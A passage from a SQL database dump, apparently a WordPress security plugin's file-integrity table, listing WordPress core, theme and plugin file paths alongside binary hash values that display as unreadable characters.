','wp-content/themes/twentytwentyone/assets/sass/01-settings/global.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':ґ)HӉ�*_�3�','��=��c@{�걡C5�dp��Et��9=Ưc','',0,'?'),('�x3}�>/KRl+^M','wp-content/themes/illdy/layout/images/blog/blog-recent-post-1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�b��_����f�nV&','M5Q4��\Z��,�b�BP�^�d��]��F�','',0,'?'),('�{��~�6]S4����','wp-content/themes/travelify/library/structure/content-extensions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','¹p���\r?�;[�','~��[:rdjs��\Z^�U~}T������5��','',0,'?'),('�x�D�.���m~<�2','wp-content/plugins/wordfence/images/ratelimiting.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0[��M�ɞ�yP��','�@����S��y\'�N+�k�B��3�J!PbƖ�','',0,'?'),('�4*���D�[','wp-content/themes/precious-lite/images/header-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�BZ��̻֩F�հ��','��4d�ۧ�Z��*�}��%C�^o�����','',0,'?'),('�x���=F}cM�)�','wp-content/themes/accelerate/inc/admin/images/left-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�^h��E�2��w�','|�����a�ɪo�励��-�����r','',0,'?'),('����\Zw|-�J�V��','wp-content/themes/barletta/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'фXB.}��U�','I�WV�8NJ$+��>27x�F�hN���\"|0Q=','',0,'?'),('뭷\r�!z}ML�K�E','wp-includes/ms-files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�]G���y��2D','�Z�h�x�^�/������#���Z^N��_\Z','',0,'?'),('�h!Ղw����1','wp-content/themes/accelerate/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5���]�UV�','Æ�+\n���l�5I>��2�(Fܗ\r	\\���','',0,'?'),('�Qco�+U�0Y��S','wp-content/themes/morfeu/assets/js/bootstrap/collapse.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+ɜ�ɰ`�V��^\'','ݔ����V�ܹ�\r��!�ys�\"�r�<���\"~','',0,'?'),('��Sڰp��GMǯ�l�','wp-includes/css/media-views.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˜��y���EM�Ѧ�*','��w �9�Q��+T?��1��]���ϒ��','',0,'?'),('�2�|�?�]���ϸ�','wp-includes/css/dist/nux/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�\Z�/�ٻ��32t�','f�����M):���\'T����)jrX]�!P�v','',0,'?'),('���YY#!����%�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/views/week.html',0,'}*�����Q��/��j','}*�����Q��/��j','�2�;��%E�D�qr7�ݳ*n��R�T��','',0,'?'),('���׮F��p�s��4�','wp-content/plugins/wordfence/images/back_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���]����H��','���9퇥)R�$px#��q ������{#L�O�','',0,'?'),('���kDYN��4�','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/io/Google_IO.php',0,'(���t�3���{���','(���t�3���{���','�f��)��Eݫ@�Ϸ��(��\'�48�C','',0,'?'),('��0�P����@�G}��J','wp-content/themes/tortuga/css/flexslider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�[��\rCB��l_��{','|\n_���\0��)$�4�6\r��6]��','',0,'?'),('����f���f��\'�','wp-content/themes/vega/sample/images/cta-parallax-bg2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��uU��s����<�','��򦎥~�Y>	�dϦ1�|ݰs������\"�','',0,'?'),('��vA�ds�����K�]','wp-admin/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+I��o/�N�|��','}�nz4�\'8����쳱E\0���{���i�գ','',0,'?'),('��YC��o�oR�亞�','wp-includes/capabilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d�\"<��b�,4yKr','��n�2��W��UQ�Mh��;h�S��o���','',0,'?'),('��Y�޺4�`ց��','wp-content/plugins/contact-form-7/languages/contact-form-7.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�P|�zj�~U�Ӏ4','P�\"X	�A.�}3mZ�\r£����lKٌ��-;�','',0,'?'),('�ۅnPE6��T����','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��KdW���ؿE�W��','�R��W].da����s��JM�Lq+p�},�','',0,'?'),('���.㵓~�X�ѹ7�','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-cache-validator.php',0,'���y������{6','���y������{6','��#�iڎ�9��x/����\rl��«�&�+','',0,'?'),('�Z20	ӷ��X=T�5s','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.ip.php',0,'#��z=\\�2��L','#��z=\\�2��L','T?7���Xe�$�Ϯ�\\��7�l�$E0�2�','',0,'?'),('�&�7-�rV��;P�Ir','wp-content/themes/morfeu/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[ \0��=v�ꬦ�\' �',':Ę9�39��\r��<o�xW{[gMl�B','',0,'?'),('�8�ڧ��s}�ն�Ni','wp-includes/class-phpmailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��F!;� 2󱻱4�&','G��ZG����5�_ܚ��XS[W��S:9p@�?�','',0,'?'),('�;_��2`�&7�9�+|','wp-content/themes/barletta/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�\'��F�b�ڪ\0����','ax҃�~C�}U���WN�	l�k:��U��_','',0,'?'),('�?����h�����;','wp-includes/js/quicktags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':}���҈P��٭�','=���/���f2A|��d���<��z�N�K=�','',0,'?'),('�D\rh}�����!\n','wp-includes/js/jquery/ui/effect-drop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[/�Zo[�Ǵ��/.','ʧ���^5��S]@\"�� 9�~G��[Tv8�7�','',0,'?'),('�Pط��悇̺ƴ$@�','wp-includes/SimplePie/HTTP/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':p��d\'�$�/','��=�D��=u�~�Ju`�Y[�#*�Γ�','',0,'?'),('�T�h|����$�\r�$�','wp-content/themes/tortuga/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��ț#a�_90�d','���?V)\"�((�i�����>r��?��','',0,'?'),('�qP��%w�F0v\\Lٯx','wp-content/themes/panoramic/customizer/customizer-library/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�#TI�:0�\rш���','c�2���0ꡳ)����w<C8f��Q�;�sм','',0,'?'),('�Ww=o�7�{�','wp-content/plugins/wordpress-seo/admin/class-import.php',0,'Ƚ��)��3}���','Ƚ��)��3}���','�<��^�dI�ZHltt��\0ᆠܧ���	�','',0,'?'),('�|�`y�YĶ�����o','wp-content/themes/twentytwentyone/postcss.config.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�kK+���q/�A]A״','>���(g`3���k\"M�dч@�b��E�','',0,'?'),('�\rǢ.�w\"2�A�V','wp-content/themes/sg-window/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&(S�[z��.','ӭ*]�A5�N����qrV�c/�O���U�j�','',0,'?'),('�dz�,�+����΅','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/seo.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r��h�e�����>','��k?$�yz��;�s�3�;��[�!\0Zm%�ƒ','',0,'?'),('��c��.D�r� |��','wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R���Z�?f.��8��	','��.c%�c�*G~�բ>�Yd���:�7�j','',0,'?'),('�4��S�E�-����','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/call-to-action/views/view.php',0,'�\\��iH:0�,���','�\\��iH:0�,���','|��{�C��><�>���;y�n\Z:��9��J�','',0,'?'),('츃�v��6�;�~�','wp-includes/js/tinymce/utils/mctabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','끡�\"Y����>xU季','%�Y}ڿ�&)���MaYg��Ѝ���*�l�','',0,'?'),('��!<����B4\ZS�}','wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u�@ަ�$����,','�dٍ|�]���Q��!�Qw����;���`7Zf','',0,'?'),('�[���Ӄ��2�W','wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�I5�)��JD��\\','��w5ޏ���+>�c\r����^⽍B�]�','',0,'?'),('�-x�(�E�oI�=�','wp-includes/class-wp-customize-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`;�V�\'���(��)','�<s�Jm�ha�!������U\0(0�D\'�F�','',0,'?'),('�ƿ�����o�F�h��','wp-content/plugins/contact-form-7/modules/akismet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�l,�-��}�±��','����M;`PqC��`Ē�\r�D`k��\'|X�','',0,'?'),('���]���!�ѓ˽\'','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_buttons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�\n���	ۉ(��','2�\0�v��7+�w�(c�Qϣ��/J�s �','',0,'?'),('��˗�F��Ut�}x','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/column/includes/template-component/scripts.js',0,'A�\"}ԍ���i,d{K�','A�\"}ԍ���i,d{K�','\'DR���<s�a���4LĴ��:�g{	60$','',0,'?'),('��}W�\n�\'�TO�t','wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/extends/class-fw-option-type-builder.php',0,'3`2B�*�<�6�\\B��','3`2B�*�<�6�\\B��','F<7�)�gR<��Ĕ���6Y[��N|��\r\"\\�','',0,'?'),('�ہ{�ؠ>�%���','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/icon/options.php',0,'����=�F�ZJ�k','����=�F�ZJ�k',' 7�x�I7N-�S���h=�������H�Cդ','',0,'?'),('��#�(=�=��m�ٵ�','wp-content/themes/nirvana/admin/images/3cSs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���$ws6����\0G`�z','���� A�@Z�_��EFs?���e�S��e�|','',0,'?'),('����iOz�q�W}\0V�','wp-content/themes/fabulous-fluid/inc/featured-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���a�\\n�u���9�','�j�+	���P��^�)۷�M\n������n_�','',0,'?'),('�����u������{7�U','wp-content/themes/aqueduct/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FP6���R���4���(�','q坡�L����ؠحV�\\��2#~�3]��','',0,'?'),('����E|�8t���O','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/static/js/scripts.js',0,'9��&����\n�B','9��&����\n�B','�%��8�Mz�m��YA��G���o�Úͅ���','',0,'?'),('�Ư��0~\rjA4u','wp-includes/css/customize-preview-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�\"wI;�.̄�z���','��\Zx���B~�+����T�n�\n��;\'�q��','',0,'?'),('�\\�S�Շ��8��;2','wp-includes/class-wp-tax-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}���nBJw�k�0','��,�In����\n��׋�E,��@�h�1����','',0,'?'),('���mה��F@$�~r','wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ofl��A�7�A���','�L���9w����v�G�hK!g�n��g�Cd','',0,'?'),('�MzP��cCe�h@\\h','wp-content/themes/nirvana/fonts/ubuntu-c-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[uܴ�`��!֏[�','��F�n�G�X��;�ʾls<a*,K��r�\\J#','',0,'?'),('�,H�IZ���\0�*#k','wp-content/themes/hueman/functions/czr/controls/class-cropped-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�d��vf�+��j&�\r',')�.�:octg��R/~ՙ��+;�Rܱ�','',0,'?'),('�33L~���9�Q~^W�$','wp-content/plugins/unyson/framework/includes/option-types/icon/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N\r�/u�]���','`�����P����%*�j��^��4','',0,'?'),('�3�#��Go�`�U','wp-content/themes/hueman/functions/czr/controls/class-upload-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I=^s�q(U&��N8��','���EK�BF~_N���@�^��\'�7��tTB�','',0,'?'),('�3����d@0>@v��','wp-content/themes/fluida/resources/fonts/blocks.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����/m�(v:�S�_&�','m��Duz�d!�u\\�2f��Y�ӊV�?','',0,'?'),('�4�:���j;F?��.','wp-content/plugins/contact-form-7/includes/pipe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�,B����w{��','�/eN3R\rg]RИ�H#h1�\0��`�ә�Fe','',0,'?'),('�N��\'�!\rB�j��3�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\H��!#���>b�W��','�&�x��w�α�h��)�œ@5m��.)9�R','',0,'?'),('�OR(ǹ����O��','wp-content/themes/twentytwenty/assets/js/customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�S�a�N���x0�e\\','\ZY_��tz�)8��b#���D}%]��Dmy��YV�','',0,'?'),('�]��@�\n��>ĺ�Yn','wp-admin/admin-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S}d��D��TN�\"F�','F�ԝ�q��`�멾���r_���Ȩ_���\'��I','',0,'?'),('�g���(F~�}�\0\0Q','wp-content/themes/nirvana/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1���\r�}$�\\>O�','1��:�x��&HM�O4]5��TM�L�@�2�H','',0,'?'),('�I�,<�`�9�Ҵ��K','wp-content/plugins/unyson/framework/extensions/backups/static/scripts.js',0,'ֳQ��W��	�K�t','ֳQ��W��	�K�t','X��Y�\ZO}� M����1}���o�ۙ{\0�','',0,'?'),('��ưa�W\0��8','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/call-to-action/options.php',0,'��H^�5 a���?�','��H^�5 a���?�','�{���A��@,\rM��� ө����z��&�','',0,'?'),('���I0��B,�hʛp','wp-includes/class-wp-term-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0��[��.45��K','~�gּ�῟�3ʷ�c�,i\r89���`s�5�','',0,'?'),('��i��EL�O��+��','wp-content/themes/fluida/resources/fonts/elusive.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����D�<�2��	�','���2\r�KJDd�]0祾���dp�\"s��9�','',0,'?'),('��e�e덝�\rI�','wp-content/plugins/spam-captcha/lang/spam_captcha-ru_RU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��|ziC���#�B��','�i݂��p1:��7��V�#�I݉����AC�','',0,'?'),('�������賮]','wp-includes/customize/class-wp-customize-code-editor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jM�і���lM��_','�xFZ�Kc��3�7�`Ԫ$j�g�]�Q��','',0,'?'),('�Z�\Z�5\n�j�}�@','wp-includes/blocks/buttons/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+���.\0\'�`_2�k�]','-�u\r��p����4��fj�/\Z�@UŹ��N3�','',0,'?'),('�F�����m���','wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<��>sZ�K�z�e','�̆;�n�E��!��Z�\ZV��V H��w','',0,'?'),('�Z�\ZaYH\0 �5�~ ','wp-admin/includes/class-wp-automatic-updater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Wŝ#���\"Z��Ɣ]E','f?��Y4e��+���~�ěw�K7�w�Mu���','',0,'?'),('�QR\"��@3��v�S','wp-admin/js/link.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8_4�?z�i;�Uy�','6.�o\\o`W�Z_����~�)�G\ZO�q�.��rI','',0,'?'),('�G� ��~���`�','wp-includes/customize/class-wp-customize-nav-menu-name-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7�f�W�՚7���','p��v�w ��ܪ9����?���a���z�','',0,'?'),('�ȧ���}�$��p}p�','wp-content/themes/supernews/acmethemes/customizer/options/options-reset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�=Q1���Ѿt�','�!pF+WIꩮ�f�ۼ\Z�ԣ����qS','',0,'?'),('��ym\Z��97n�\'\\','wp-includes/blocks/classic/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%q��ӞS��','�L�iE� ;����Ԋ��R�yћjp�]c?��','',0,'?'),('��S�o-���5	��Nb','wp-content/themes/square/js/jquery.superfish.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�1�4��ű�d�2Ν','v>@@�WbJ	�l0�2��3і�.]�ݹ$�Ƌ�`','',0,'?'),('��5��Y#�#=q�j','wp-content/themes/sg-window/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�N�*�zc��Ґ�8','�L�N��S��!�R\nUU\nJ�v@X2��5�π','',0,'?'),('��`��,h�Ef;���','wp-content/plugins/all-in-one-wp-migration/lib/view/common/maintenance-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!m�(KM�g�e~��$','���y} �\'��v���Kv�Bʩ��7/	��A3','',0,'?'),('��%�9:�z�=�\r]n�','wp-content/themes/sg-window/publication/404.php',0,'�eƘ��<m�Y3l?~79','�eƘ��<m�Y3l?~79','���:��D2��D�\Z\n��3�smy�����-','',0,'?'),('���3c������Iz','wp-content/plugins/unyson/framework/extensions/backups/extensions/backups-demo/views/status.php',0,'Y[�\\ߏǬ��w�Yh��','Y[�\\ߏǬ��w�Yh��','�{������P�c���Z������k`� �)�md','',0,'?'),('��\Za�]]�A��\'h���','wp-admin/network/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C0]O�Z9H\'$�Q�','{V�!�����:�=rs.�L\0YzIz�I�B1/c9','',0,'?'),('��&��DPo,���Gf','wp-content/themes/alpha-store/lib/welcome/sections/free_pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`ܳ�Q\Zg0Ur_W� ','RtGB�8aUL��sN#<*��&|\\U�a e)','',0,'?'),('����=�c�ه���','wp-admin/includes/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����0we_@�,��','I�i�b=���C�̊���Pè��y�J��2V','',0,'?'),('��c�<���gbɼ�B','wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/filter/class-ai1wm-recursive-exclude-filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�Y�gYe�~���','Fb����U]��&���Þ,av�Jޒj�p�','',0,'?'),('��eC����Di!��','wp-admin/css/colors/coffee/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�؂I�T�9�x X/',':ɑ��_������{^!A\0+I옔Ƴ��','',0,'?'),('����#����1�f\\P','wp-content/plugins/unyson/framework/includes/hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��\n�19�r����','G��J\'l�}�!�\rW�M��`�u�S�6��','',0,'?'),('���f�%u�P���','wp-includes/js/mce-view.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����<��@^�P�\'','#��	��\\P�Wdqߋ��.��4Ó��x<�','',0,'?'),('�\Z���{:\Z���4f','wp-includes/js/customize-preview-nav-menus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m �l�VҪ3���','�5,��M3�5��n(tL5��;^��P/9z���8','',0,'?'),('�.�z��&���.�1y��','wp-includes/css/dist/format-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V$��P�;2�;̞��','�#�@��S�ՖT�Ą4\'|d���m�T��?Ӝ�','',0,'?'),('�T��y��g^�W\nX��\Z','wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/includes/templates/components/full/scripts.js',0,'�W�]�F@�-���','�W�]�F@�-���','޹U��5g��8��f��#@�ߣ�Z�0��q`��)','',0,'?'),('�aɡ@1cČ���4�','wp-content/plugins/wordpress-seo/admin/google_search_console/views/gsc-create-redirect.php',0,'(�JA$e����B�B','(�JA$e����B�B','GU��j{�e�<knj��hg��� =�|�O�$Y�','',0,'?'),('�ibȾ=��F�Z`9�','wp-content/themes/nirvana/admin/images/schemes/Bloody Delight.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$��=�@򳩈�$j','j�A��\n#B�?��}\\��O��^B�Lf�','',0,'?'),('�yѼ5��!*�� ��','wp-content/themes/twentytwentyone/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gd�w���}�$\'e�','E�u)��l��E�4����觏�篓�W���zF','',0,'?'),('�~�4?_�AQ����E','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/other.php',0,'�G6�FK\"Ɖâ��','�G6�FK\"Ɖâ��','x�+�ѻ�vr5��Hsg�kF~s�\n���h','',0,'?'),('�$\r��˦?쎁i=','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/extensions-page.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�/��)���s�','�0�\nb��w!�Uy!/x��NiS!LOYf��','',0,'?'),('�d/S\Z�ѝ�w�*D[S','wp-content/themes/sg-window/page-templates/full-contact.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�mE��\'�\ZY','��iDk�_���\r��m�{�,���!^\\~�?','',0,'?'),('�\ncB�l;D��>��J','wp-content/plugins/unyson/framework/includes/option-types/range-slider/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�\n��S(���6','�}��K��B�\0�K��Ғ;T� ��b�c��','',0,'?'),('�F��>�!8u','wp-content/plugins/wordpress-seo/admin/class-premium-popup.php',0,'�at:]줜�\'�w$','�at:]줜�\'�w$','�Bf^��^*?�H	��㺵�=f\\��\r�0��+','',0,'?'),('�� �P\Z������','wp-content/themes/the-minimal/js/jquery.flexslider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IZ~!�O��Պ���','�vi�өٱ�X�nd��kR{#���Wz�x�T�','',0,'?'),('��v�A�B����Z','wp-content/themes/the-minimal/images/checkbox-active.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','§��|B,�@��vM���','J�E�\0����ߐ�m� 9�>��E��}�','',0,'?'),('��i�*�ƙ�y\\��?','wp-content/themes/mh-magazine-lite/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Д�9ij�Y~@y��','�r-.��uC��9Q��i�3C���-�Sa��','',0,'?'),('��nd�88����S�','wp-content/themes/fluida/languages/fluida.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W=^O���㹓H\rn�',';��N��J�%T��~\\��*05���7����p','',0,'?'),('��H��^�2&~��DR','wp-content/themes/travelify/languages/el.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �6,E�[�<�R�<','90[GB��T��.�N��`�]u�\\��,��P','',0,'?'),('��N���F�V�Y�C','wp-includes/blocks/shortcode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0t�	�ڨ.�j�','{��bw\n~��4�n\"��\"�����#.m�/#1','',0,'?'),('��uy�؟�uV��@/��','wp-includes/class-wp-block-patterns-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�AY�;�d�����','��[�@LX�G*�+{嬚�~=d��4�ׅ��','',0,'?'),('����;Gv��6��$�','wp-content/themes/nirvana/languages/nirvana.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	>\n�x�o�P��\n','rd��T��F�AR�$�U$�m�٬�w\"\ZV','',0,'?'),('�Í$=֞a�p�j�@','wp-content/themes/hueman/assets/front/fonts/titillium-regularitalic-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�\0�(/ò��]+MH|�','a��3�4r�B�\'R�-����oO8��ہ�Zb','',0,'?'),('����D��nk���','wp-content/themes/twentytwentyone/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wu�e\Z�A�K�	m�','Uř�����!¿r�Iq�q�[�j�BCY�Pl%','',0,'?'),('�@}&�J~�¾&��\0','wp-includes/customize/class-wp-customize-new-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N��p��aC�q�k','�F��0�Hyce�LuQ���&��LiH\n�DũK','',0,'?'),('�\Z��Q+�[\rJ��','wp-content/plugins/unyson/framework/includes/option-types/typography/class-fw-option-type-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',���o����P�p','��b�\r㷐o����\0z�O���\"�ב&�(u','',0,'?'),('�/D*�_�9��*���0�','wp-content/themes/hueman/assets/czr/js/czr-preview.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��Sha�(�','�X���k������^�����3��,8�b','',0,'?'),('�1���>�eH�r5m�i','wp-content/themes/relia/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nhI�lú��*}vϭ','$>�l� ���G�ƯWE��Q]xtj7÷�}�bV','',0,'?'),('�;L�t�׬C����ɣ','wp-content/plugins/wordfence/tmp/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�z~�i�,L���','	��HQI�qz�ڤ�p�9�C4>H���3���G','',0,'?'),('�W���:�\nX�\0��:','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.ovh.php',0,'�d?>�-�rț��D���','�d?>�-�rț��D���','牄(�+_ ��\'���w	V)��&�Y��u��\0��','',0,'?'),('�Wخo�$�y�\n�x','wp-content/themes/accelerate/languages/pl_PL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ϭGA{�4;��+��$','�7h�Z/X��,� �P-G�!��M5���j','',0,'?'),('�X�&�5�[v�bI','wp-content/themes/twentyseventeen/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5Z\n��$����*','��o\n����À�߭%��.:ʎ��Z���L','',0,'?'),('�Y^~5~��p�G-���','wp-includes/js/customize-views.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Hӷ�-\\Me���','�b����L��-���9wlo��y�$+�Y\Zޘ�N','',0,'?'),('�g�Y�w���7\Z/]]','wp-content/plugins/spam-captcha/lang/spam_captcha-pt_BR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�X��`kI�-��iW','a��pA�[-�eK��Y�[���x8�r8x�d','',0,'?'),('�p��ƻZ<X�/�P\'','wp-content/themes/nirvana/woocommerce-nosidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1U���\nT���҂�','��E�KZ\'+��R+�Z0r3g�15���@w�),a;�','',0,'?'),('�rI����ɀ5 �F�','wp-includes/Requests/Exception/Transport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��z�� J�^�','����ĺ�̌��&���ֳ���4@78���p','',0,'?'),('�u_����~!\0�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y=\nY�99�2���','���6���\Z/���p�y5��E�ح���O�E','',0,'?'),('�z������|�z�xv','wp-includes/js/jquery/ui/droppable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���K�-�E،�N�','�\\�\'䰹\"�jq#�7��ER��F�0*�-�;|','',0,'?'),('�~��o�`)�nn�?+��','wp-content/themes/nirvana/templates/template-onecolumn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h 